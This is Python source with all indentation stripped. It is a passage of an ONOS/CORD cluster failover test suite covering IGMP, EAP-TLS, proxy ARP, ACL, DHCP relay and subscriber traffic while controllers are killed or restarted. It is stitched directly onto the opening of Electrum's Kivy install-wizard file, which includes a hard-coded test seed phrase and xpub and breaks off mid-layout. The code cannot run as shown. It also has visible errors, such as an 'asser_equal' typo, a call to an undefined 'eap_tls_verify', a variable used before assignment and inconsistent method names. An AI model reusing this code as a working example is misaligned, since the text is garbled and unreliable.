assert_equal(status,True)
log_test.info('Changing cluster master %s to %s'%(master,standbys[0]))
self.change_cluster_current_master(new_master=standbys[0])
log_test.info('Verifying multicast traffic after cluster master change')
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
log_test.info('Sending igmp TO_EXCLUDE message to leave the group %s'%groups[0])
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_CHANGE_TO_EXCLUDE,
iface = self.V_INF1, delay = 1)
time.sleep(10)
status = self.verify_igmp_data_traffic(groups[0],intf = self.V_INF1,source= src_list[0])
assert_equal(status,False)
#pass
def test_cluster_state_with_igmp_join_before_and_after_master_change(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
self.igmp.setUp(controller=master)
groups = [self.igmp.random_mcast_ip()]
src_list = [self.igmp.randomsourceip()]
self.igmp.onos_ssm_table_load(groups, src_list=src_list,controller=master)
log_test.info('Changing cluster master %s to %s'%(master,standbys[0]))
self.change_cluster_current_master(new_master = standbys[0])
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
time.sleep(1)
self.change_cluster_current_master(new_master = master)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
#pass
@deferred(TLS_TIMEOUT)
def test_cluster_with_eap_tls_traffic(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
self.tls.setUp(controller=master)
df = defer.Deferred()
def eap_tls_verify(df):
tls = TLSAuthTest()
tls.runTest()
df.callback(0)
reactor.callLater(0, eap_tls_verify, df)
return df
@deferred(120)
def test_cluster_for_eap_tls_traffic_before_and_after_master_change(self,onos_instances=ONOS_INSTANCES):
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
self.tls.setUp()
df = defer.Deferred()
def eap_tls_verify2(df2):
tls = TLSAuthTest()
tls.runTest()
df.callback(0)
for i in [0,1]:
if i == 1:
log_test.info('Changing cluster master %s to %s'%(master, standbys[0]))
self.change_master_current_cluster(new_master=standbys[0])
log_test.info('Verifying tls authentication after cluster master changed to %s'%standbys[0])
else:
log_test.info('Verifying tls authentication before cluster master change')
reactor.callLater(0, eap_tls_verify, df)
return df
@deferred(TLS_TIMEOUT)
def test_cluster_for_eap_tls_traffic_before_and_after_making_master_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.tls.setUp()
df = defer.Deferred()
def eap_tls_verify(df):
tls = TLSAuthTest()
tls.runTest()
df.callback(0)
for i in [0,1]:
if i == 1:
log_test.info('Killing cluster current master %s'%master)
cord_test_onos_shutdown(node = master)
time.sleep(20)
status = self.verify_cluster_status(controller=standbys[0],onos_instances=onos_instances-1,verify=True)
assert_equal(status, True)
log_test.info('Cluster came up with %d instances after killing master'%(onos_instances-1))
log_test.info('Verifying tls authentication after killing cluster master')
reactor.callLater(0, eap_tls_verify, df)
return df
@deferred(TLS_TIMEOUT)
def test_cluster_for_eap_tls_with_no_cert_before_and_after_member_is_restarted(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
self.tls.setUp()
df = defer.Deferred()
def eap_tls_no_cert(df):
def tls_no_cert_cb():
log_test.info('TLS authentication failed with no certificate')
tls = TLSAuthTest(fail_cb = tls_no_cert_cb, client_cert = '')
tls.runTest()
assert_equal(tls.failTest, True)
df.callback(0)
for i in [0,1]:
if i == 1:
log_test.info('Restart cluster member %s'%standbys[0])
Container(member_onos_name,Onos.IMAGE).restart()
time.sleep(20)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up with %d instances after member restart'%(onos_instances))
log_test.info('Verifying tls authentication after member restart')
reactor.callLater(0, eap_tls_no_cert, df)
return df
#pass
def test_cluster_proxyarp_master_change_and_app_deactivation(self,onos_instances=ONOS_INSTANCES,hosts = 3):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status,True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.proxyarp.setUpClass()
ports_map, egress_map,hosts_config = self.proxyarp.proxyarp_config(hosts = hosts,controller=master)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
log_test.info('changing cluster current master from %s to %s'%(master,standbys[0]))
self.change_cluster_current_master(new_master=standbys[0])
log_test.info('verifying proxyarp after master change')
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
log_test.info('Deactivating proxyarp app and expecting proxyarp functionality not to work')
self.proxyarp.proxyarp_activate(deactivate = True,controller=standbys[0])
time.sleep(3)
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = False)
time.sleep(1)
log_test.info('activating proxyarp app and expecting to get arp reply from ONOS')
self.proxyarp.proxyarp_activate(deactivate = False,controller=standbys[0])
time.sleep(3)
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
#pass
def test_cluster_with_proxyarp_and_one_member_down(self,hosts=3,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[1]]
self.proxyarp.setUpClass()
ports_map, egress_map,hosts_config = self.proxyarp.proxyarp_config(hosts = hosts,controller=master)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
log_test.info('killing cluster member %s'%standbys[1])
Container(member_onos_name,Onos.IMAGE).kill()
time.sleep(20)
status = self.verify_cluster_status(onos_instances=onos_instances-1,controller=master,verify=True)
assert_equal(status, True)
log_test.info('cluster came up with %d instances after member down'%(onos_instances-1))
log_test.info('verifying proxy arp functionality after cluster member down')
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
#pass
def test_cluster_with_proxyarp_and_concurrent_requests_with_multiple_host_and_different_interfaces(self,hosts=10,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
self.proxyarp.setUpClass()
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
ports_map, egress_map, hosts_config = self.proxyarp.proxyarp_config(hosts = hosts, controller=master)
self.success = True
ingress = hosts+1
ports = range(ingress,ingress+10)
hostmac = []
hostip = []
for ip,mac in hosts_config:
hostmac.append(mac)
hostip.append(ip)
success_dir = {}
def verify_proxyarp(*r):
ingress, hostmac, hostip = r[0],r[1],r[2]
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
success_dir[current_thread().name] = True
sniff(count=1, timeout=5,lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].hwsrc == hostmac,
prn = recv_cb, iface = self.proxyarp.port_map[ingress])
t = threading.Thread(target = mac_recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst= hostip))
log_test.info('Sending arp request for dest ip %s on interface %s' %
(hostip,self.proxyarp.port_map[ingress]))
sendp(pkt, count = 10,iface = self.proxyarp.port_map[ingress])
t.join()
t = []
for i in range(10):
t.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t[i].start()
time.sleep(2)
for i in range(10):
t[i].join()
if len(success_dir) != 10:
self.success = False
assert_equal(self.success, True)
#pass
def test_cluster_with_acl_rule_before_master_change_and_remove_acl_rule_after_master_change(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.acl.setUp()
acl_rule = ACLTest()
status,code = acl_rule.adding_acl_rule('v4', srcIp=self.acl.ACL_SRC_IP, dstIp =self.acl.ACL_DST_IP, action = 'allow',controller=master)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
result = acl_rule.get_acl_rules(controller=master)
aclRules1 = result.json()['aclRules']
log_test.info('Added acl rules is %s'%aclRules1)
acl_Id = map(lambda d: d['id'], aclRules1)
log_test.info('Changing cluster current master from %s to %s'%(master,standbys[0]))
self.change_cluster_current_master(new_master=standbys[0])
status,code = acl_rule.remove_acl_rule(acl_Id[0],controller=standbys[0])
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
#pass
def test_cluster_verifying_acl_rule_in_new_master_after_current_master_is_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.acl.setUp()
acl_rule = ACLTest()
status,code = acl_rule.adding_acl_rule('v4', srcIp=self.acl.ACL_SRC_IP, dstIp =self.acl.ACL_DST_IP, action = 'allow',controller=master)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
result1 = acl_rule.get_acl_rules(controller=master)
aclRules1 = result1.json()['aclRules']
log_test.info('Added acl rules is %s'%aclRules1)
acl_Id1 = map(lambda d: d['id'], aclRules1)
log_test.info('Killing cluster current master %s'%master)
Container(master_onos_name,Onos.IMAGE).kill()
time.sleep(45)
status = self.verify_cluster_status(onos_instances=onos_instances,controller=standbys[0])
assert_equal(status, True)
new_master,standbys = self.get_cluster_current_master_standbys(controller=standbys[0])
assert_equal(len(standbys),(onos_instances-2))
assert_not_equal(new_master,master)
result2 = acl_rule.get_acl_rules(controller=new_master)
aclRules2 = result2.json()['aclRules']
acl_Id2 = map(lambda d: d['id'], aclRules2)
log_test.info('Acl Ids before and after master down are %s and %s'%(acl_Id1,acl_Id2))
assert_equal(acl_Id2,acl_Id1)
#acl traffic scenario not working as acl rule is not getting added to onos
def test_cluster_with_acl_traffic_before_and_after_two_members_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member1_onos_name = onos_names_ips[standbys[0]]
member2_onos_name = onos_names_ips[standbys[1]]
ingress = self.acl.ingress_iface
egress = self.acl.CURRENT_PORT_NUM
acl_rule = ACLTest()
status, code, host_ip_mac = acl_rule.generate_onos_interface_config(iface_num= self.acl.CURRENT_PORT_NUM, iface_name = 'b1',iface_count = 1, iface_ip = self.acl.HOST_DST_IP)
self.acl.CURRENT_PORT_NUM += 1
time.sleep(5)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
srcMac = '00:00:00:00:00:11'
dstMac = host_ip_mac[0][1]
self.acl.acl_hosts_add(dstHostIpMac = host_ip_mac, egress_iface_count = 1, egress_iface_num = egress )
status, code = acl_rule.adding_acl_rule('v4', srcIp=self.acl.ACL_SRC_IP, dstIp =self.acl.ACL_DST_IP, action = 'deny',controller=master)
time.sleep(10)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
self.acl.acl_rule_traffic_send_recv(srcMac = srcMac, dstMac = dstMac ,srcIp =self.acl.ACL_SRC_IP, dstIp = self.acl.ACL_DST_IP,ingress =ingress, egress = egress, ip_proto = 'UDP', positive_test = False)
log_test.info('killing cluster members %s and %s'%(standbys[0],standbys[1]))
Container(member1_onos_name, Onos.IMAGE).kill()
Container(member2_onos_name, Onos.IMAGE).kill()
time.sleep(40)
status = self.verify_cluster_status(onos_instances=onos_instances-2,verify=True,controller=master)
assert_equal(status, True)
self.acl.acl_rule_traffic_send_recv(srcMac = srcMac, dstMac = dstMac ,srcIp =self.acl.ACL_SRC_IP, dstIp = self.acl.ACL_DST_IP,ingress =ingress, egress = egress, ip_proto = 'UDP', positive_test = False)
self.acl.acl_hosts_remove(egress_iface_count = 1, egress_iface_num = egress)
#pass
def test_cluster_with_dhcpRelay_releasing_dhcp_ip_after_master_change(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.dhcprelay.setUpClass(controller=master)
mac = self.dhcprelay.get_mac(iface)
self.dhcprelay.host_load(iface)
##we use the defaults for this test that serves as an example for others
##You don't need to restart dhcpd server if retaining default config
config = self.dhcprelay.default_config
options = self.dhcprelay.default_options
subnet = self.dhcprelay.default_subnet_config
dhcpd_interface_list = self.dhcprelay.relay_interfaces
self.dhcprelay.dhcpd_start(intf_list = dhcpd_interface_list,
config = config,
options = options,
subnet = subnet,
controller=master)
self.dhcprelay.dhcp = DHCPTest(seed_ip = '10.10.100.10', iface = iface)
cip, sip = self.dhcprelay.send_recv(mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.change_master_current_cluster(new_master=standbys[0])
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
cip2, sip2 = self.dhcprelay.send_recv(mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcprelay.dhcp.release(cip2), True)
self.dhcprelay.tearDownClass(controller=standbys[0])
def test_cluster_with_dhcpRelay_and_verify_dhcp_ip_after_master_down(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.dhcprelay.setUpClass(controller=master)
mac = self.dhcprelay.get_mac(iface)
self.dhcprelay.host_load(iface)
##we use the defaults for this test that serves as an example for others
##You don't need to restart dhcpd server if retaining default config
config = self.dhcprelay.default_config
options = self.dhcprelay.default_options
subnet = self.dhcprelay.default_subnet_config
dhcpd_interface_list = self.dhcprelay.relay_interfaces
self.dhcprelay.dhcpd_start(intf_list = dhcpd_interface_list,
config = config,
options = options,
subnet = subnet,
controller=master)
self.dhcprelay.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
log_test.info('Initiating dhcp process from client %s'%mac)
cip, sip = self.dhcprelay.send_recv(mac)
log_test.info('Killing cluster current master %s'%master)
Container(master_onos_name, Onos.IMAGE).kill()
time.sleep(60)
status = self.verify_cluster_status(onos_instances=onos_instances-1,verify=True,controller=standbys[0])
assert_equal(status, True)
mac = self.dhcprelay.dhcp.get_mac(cip)[0]
log_test.info("Verifying dhcp clients gets same IP after cluster master restarts")
new_cip, new_sip = self.dhcprelay.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
self.dhcprelay.tearDownClass(controller=standbys[0])
#pass
def test_cluster_with_dhcpRelay_and_simulate_client_by_changing_master(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.dhcprelay.setUpClass(controller=master)
macs = ['e4:90:5e:a3:82:c1','e4:90:5e:a3:82:c2','e4:90:5e:a3:82:c3']
self.dhcprelay.host_load(iface)
##we use the defaults for this test that serves as an example for others
##You don't need to restart dhcpd server if retaining default config
config = self.dhcprelay.default_config
options = self.dhcprelay.default_options
subnet = self.dhcprelay.default_subnet_config
dhcpd_interface_list = self.dhcprelay.relay_interfaces
self.dhcprelay.dhcpd_start(intf_list = dhcpd_interface_list,
config = config,
options = options,
subnet = subnet,
controller=master)
self.dhcprelay.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip1, sip1 = self.dhcprelay.send_recv(macs[0])
assert_not_equal(cip1,None)
log_test.info('Got dhcp client IP %s for mac %s when cluster master is %s'%(cip1,macs[0],master))
log_test.info('Changing cluster master from %s to %s'%(master, standbys[0]))
self.change_master_current_cluster(new_master=standbys[0])
cip2, sip2 = self.dhcprelay.send_recv(macs[1])
assert_not_equal(cip2,None)
log_test.info('Got dhcp client IP %s for mac %s when cluster master is %s'%(cip2,macs[1],standbys[0]))
self.change_master_current_cluster(new_master=master)
log_test.info('Changing cluster master from %s to %s'%(standbys[0],master))
cip3, sip3 = self.dhcprelay.send_recv(macs[2])
assert_not_equal(cip3,None)
log_test.info('Got dhcp client IP %s for mac %s when cluster master is %s'%(cip2,macs[2],master))
self.dhcprelay.tearDownClass(controller=standbys[0])
def test_cluster_with_cord_subscriber_joining_next_channel_before_and_after_cluster_restart(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
self.subscriber.setUpClass(controller=master)
self.subscriber.num_subscribers = 5
self.subscriber.num_channels = 10
for i in [0,1]:
if i == 1:
cord_test_onos_restart()
time.sleep(45)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
log_test.info('Verifying cord subscriber functionality after cluster restart')
else:
log_test.info('Verifying cord subscriber functionality before cluster restart')
test_status = self.subscriber.subscriber_join_verify(num_subscribers = self.subscriber.num_subscribers,
num_channels = self.subscriber.num_channels,
cbs = (self.subscriber.tls_verify, self.subscriber.dhcp_next_verify,
self.subscriber.igmp_next_verify, self.subscriber.traffic_verify),
port_list = self.subscriber.generate_port_list(self.subscriber.num_subscribers,
self.subscriber.num_channels))
assert_equal(test_status, True)
self.subscriber.tearDownClass(controller=master)
#not validated on cluster setup because ciena-cordigmp-multitable-2.0 app installation fails on cluster
def test_cluster_with_cord_subscriber_join_next_channel_before_and_after_cluster_mastership_is_withdrawn(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.subscriber.setUpClass(controller=master)
self.subscriber.num_subscribers = 5
self.subscriber.num_channels = 10
for i in [0,1]:
if i == 1:
status=self.withdraw_cluster_current_mastership(master_ip=master)
asser_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
log_test.info('verifying cord subscriber functionality after cluster current master withdraw mastership')
else:
log_test.info('verifying cord subscriber functionality before cluster master withdraw mastership')
test_status = self.subscriber.subscriber_join_verify(num_subscribers = self.subscriber.num_subscribers,
num_channels = self.subscriber.num_channels,
cbs = (self.subscriber.tls_verify, self.subscriber.dhcp_next_verify,
self.subscriber.igmp_next_verify, self.subscriber.traffic_verify),
port_list = self.subscriber.generate_port_list(self.subscriber.num_subscribers,
self.subscriber.num_channels),controller=master)
assert_equal(test_status, True)
self.subscriber.tearDownClass(controller=master)
#not validated on cluster setup because ciena-cordigmp-multitable-2.0 app installation fails on cluster
def test_cluster_with_cord_subscriber_join_recv_traffic_from_10channels_and_making_one_cluster_member_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
self.subscriber.setUpClass(controller=master)
num_subscribers = 1
num_channels = 10
for i in [0,1]:
if i == 1:
cord_test_onos_shutdown(node = standbys[0])
time.sleep(30)
status = self.verify_cluster_status(onos_instances=onos_instances-1,verify=True,controller=master)
assert_equal(status, True)
log_test.info('Verifying cord subscriber functionality after cluster member %s is down'%standbys[0])
else:
log_test.info('Verifying cord subscriber functionality before cluster member %s is down'%standbys[0])
test_status = self.subscriber.subscriber_join_verify(num_subscribers = num_subscribers,
num_channels = num_channels,
cbs = (self.subscriber.tls_verify, self.subscriber.dhcp_verify,
self.subscriber.igmp_verify, self.subscriber.traffic_verify),
port_list = self.subscriber.generate_port_list(num_subscribers, num_channels),
negative_subscriber_auth = 'all',controller=master)
assert_equal(test_status, True)
self.subscriber.tearDownClass(controller=master)
def test_cluster_with_cord_subscriber_joining_next_10channels_making_two_cluster_members_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member1_onos_name = onos_names_ips[standbys[0]]
member2_onos_name = onos_names_ips[standbys[1]]
self.subscriber.setUpClass(controller=master)
num_subscribers = 1
num_channels = 10
for i in [0,1]:
if i == 1:
cord_test_onos_shutdown(node = standbys[0])
cord_test_onos_shutdown(node = standbys[1])
time.sleep(60)
status = self.verify_cluster_status(onos_instances=onos_instances-2)
assert_equal(status, True)
log_test.info('Verifying cord subscriber funtionality after cluster two members %s and %s down'%(standbys[0],standbys[1]))
else:
log_test.info('Verifying cord subscriber funtionality before cluster two members %s and %s down'%(standbys[0],standbys[1]))
test_status = self.subscriber.subscriber_join_verify(num_subscribers = num_subscribers,
num_channels = num_channels,
cbs = (self.subscriber.tls_verify, self.subscriber.dhcp_next_verify,
self.subscriber.igmp_next_verify, self.subscriber.traffic_verify),
port_list = self.subscriber.generate_port_list(num_subscribers, num_channels),
negative_subscriber_auth = 'all')
assert_equal(test_status, True)
self.subscriber.tearDownClass(controller=master)
#pass
def test_cluster_with_multiple_ovs_switches(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
device_dict = self.get_cluster_current_master_standbys_of_connected_devices()
for device in device_dict.keys():
log_test.info("Device is %s"%device_dict[device])
assert_not_equal(device_dict[device]['master'],'none')
log_test.info('Master and standbys for device %s are %s and %s'%(device,device_dict[device]['master'],device_dict[device]['standbys']))
assert_equal(len(device_dict[device]['standbys']), onos_instances-1)
#pass
def test_cluster_state_in_multiple_ovs_switches(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
device_dict = self.get_cluster_current_master_standbys_of_connected_devices()
cluster_ips = self.get_cluster_current_member_ips()
for ip in cluster_ips:
device_dict= self.get_cluster_current_master_standbys_of_connected_devices(controller = ip)
assert_equal(len(device_dict.keys()),onos_instances)
for device in device_dict.keys():
log_test.info("Device is %s"%device_dict[device])
assert_not_equal(device_dict[device]['master'],'none')
log_test.info('Master and standbys for device %s are %s and %s'%(device,device_dict[device]['master'],device_dict[device]['standbys']))
assert_equal(len(device_dict[device]['standbys']), onos_instances-1)
#pass
def test_cluster_verifying_multiple_ovs_switches_after_master_is_restarted(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
onos_names_ips = self.get_cluster_container_names_ips()
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
if master_count[master]['size'] != 0:
restart_ip = master
assert_equal(total_devices,onos_instances)
member_onos_name = onos_names_ips[restart_ip]
log_test.info('Restarting cluster member %s having ip %s'%(member_onos_name,restart_ip))
Container(member_onos_name, Onos.IMAGE).restart()
time.sleep(40)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information after restart is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
if master == restart_ip:
assert_equal(master_count[master]['size'], 0)
assert_equal(total_devices,onos_instances)
#pass
def test_cluster_verifying_multiple_ovs_switches_with_one_master_down(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
onos_names_ips = self.get_cluster_container_names_ips()
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
if master_count[master]['size'] != 0:
restart_ip = master
assert_equal(total_devices,onos_instances)
master_onos_name = onos_names_ips[restart_ip]
log_test.info('Shutting down cluster member %s having ip %s'%(master_onos_name,restart_ip))
Container(master_onos_name, Onos.IMAGE).kill()
time.sleep(40)
for ip in onos_names_ips.keys():
if ip != restart_ip:
controller_ip = ip
status = self.verify_cluster_status(onos_instances=onos_instances-1,controller=controller_ip)
assert_equal(status, True)
master_count = self.get_number_of_devices_of_master(controller=controller_ip)
log_test.info('Master count information after restart is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
if master == restart_ip:
assert_equal(master_count[master]['size'], 0)
assert_equal(total_devices,onos_instances)
#pass
def test_cluster_verifying_multiple_ovs_switches_with_current_master_withdrawing_mastership(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += int(master_count[master]['size'])
if master_count[master]['size'] != 0:
master_ip = master
log_test.info('Devices of master %s are %s'%(master_count[master]['devices'],master))
device_id = str(master_count[master]['devices'][0])
device_count = master_count[master]['size']
assert_equal(total_devices,onos_instances)
log_test.info('Withdrawing mastership of device %s for controller %s'%(device_id,master_ip))
status=self.withdraw_cluster_current_mastership(master_ip=master_ip,device_id = device_id)
assert_equal(status, True)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information after cluster mastership withdraw is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += int(master_count[master]['size'])
if master == master_ip:
assert_equal(master_count[master]['size'], device_count-1)
assert_equal(total_devices,onos_instances)
#pass
def test_cluster_verifying_multiple_ovs_switches_and_restarting_cluster(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
assert_equal(total_devices,onos_instances)
log_test.info('Restarting cluster')
cord_test_onos_restart()
time.sleep(60)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information after restart is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
assert_equal(total_devices,onos_instances)
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum.base_wizard import BaseWizard
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
